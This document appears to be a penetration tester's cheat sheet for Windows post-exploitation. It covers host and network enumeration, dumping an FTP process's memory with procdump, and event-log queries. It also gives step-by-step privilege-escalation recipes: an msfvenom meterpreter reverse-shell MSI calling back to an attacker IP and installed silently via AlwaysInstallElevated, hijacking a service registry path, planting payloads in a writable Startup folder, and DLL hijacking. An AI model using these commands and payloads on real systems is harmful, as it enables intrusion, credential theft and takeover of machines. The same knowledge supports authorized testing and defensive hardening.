• See the Pow­er­Shell post, espe­cial­ly about the history

Various

Show who else is logged in.

qwinsta

Open the Event View­er and search in the looks. Have fun!

Network enumeration

Show the net­work con­fig­u­ra­tion. Are there mul­ti­ple interfaces?

ipconfig /all

Rout­ing information

route print

Show cur­rent net­work con­nec­tions. After check­ing this com­mand: CHECK all ports with the pre­vi­ous found ones!

netstat -ano

Check the ARP cache for oth­er com­mu­ni­ca­tion partners:

arp -a

Processes and services

If there are inter­est­ing ser­vices, refer to the ser­vices post.

Dump memory

1. Get the full taskname with
   tasklist | findstr /C:ftp
2. Upload procdump[64].exe
3. Dump process mem­o­ry with
   procdump64.exe -accepteula -ma ftp.exe
4. Down­load the gen­er­at­ed file

Windows Event Logging

Events are stored in the \system32\winevt\Logs directory.

The tool hav­abusa is a pars­er to analyse larg­er evtx-Files.

With Pow­er­Shell wev­tu­til, access can be made to the log­ging sys­tem. (More exam­ples: See Inci­dent Response Train­ing March 2025)

List logs:

wevtutil el

Search for something

wevtutil el | select-string security

Registry

See Win­dows Reg­istry post

Autoelevated

Check if autoel­e­vat­ed is active for installers:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer

If it is set to 1:

1. Cre­ate and upload payoad:
   msfvenom -p windows/meterpreter/reverse_tcp lhost=$attackerip lport=4444 -f msi -o setup.msi
2. Exe­cute it:
   msiexec /quiet /qn /i C:\Temp\setup.msi

Alter­na­tive: In an exist­ing ses­sion, use msf> use windows/local/always_install_elevated

Registry service escalation

Check in a Pow­er­shell ses­sion which groups have access to the reg­istry key for services:

Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

Check if the cur­rent user is in a group (whoami /priv) which is list­ed in Access and has the Full­Con­trol flag set. If yes:

1. Cre­ate an exe pay­load from the ser­vice tem­plate windows_service.c and upload it which should not run longer than 30 sec­onds. E.g. ele­vate the cur­rent user or cre­ate a new one or place a file somehwere.
2. Reg­is­ter the file as a new ser­vice:
   reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\s64.exe /f
3. Start the ser­vice
   sc start regsvc

Autostart/Autorun exploitations

Check if the user has write access to the autostart directory:

icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

If the out­put for the cur­rent user con­tains a F (=Full access), then copy a exe pay­load into the direc­to­ry. As soon as an admin logged in, the exe is executed.

Alter­na­tive: Check the reg­istry for autostart pro­grams and check their direc­to­ries as above.

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

DLL exploitation

Check if a process tried to load to a DLL which we can replace (or maybe the process tried dif­fer­ent paths to load the DLL and we can write/create a DLL before the DLL it found usu­al­ly). If yes, use windows_dll.c to cre­ate a DLL. (Use PowerUp to deter­mine location.)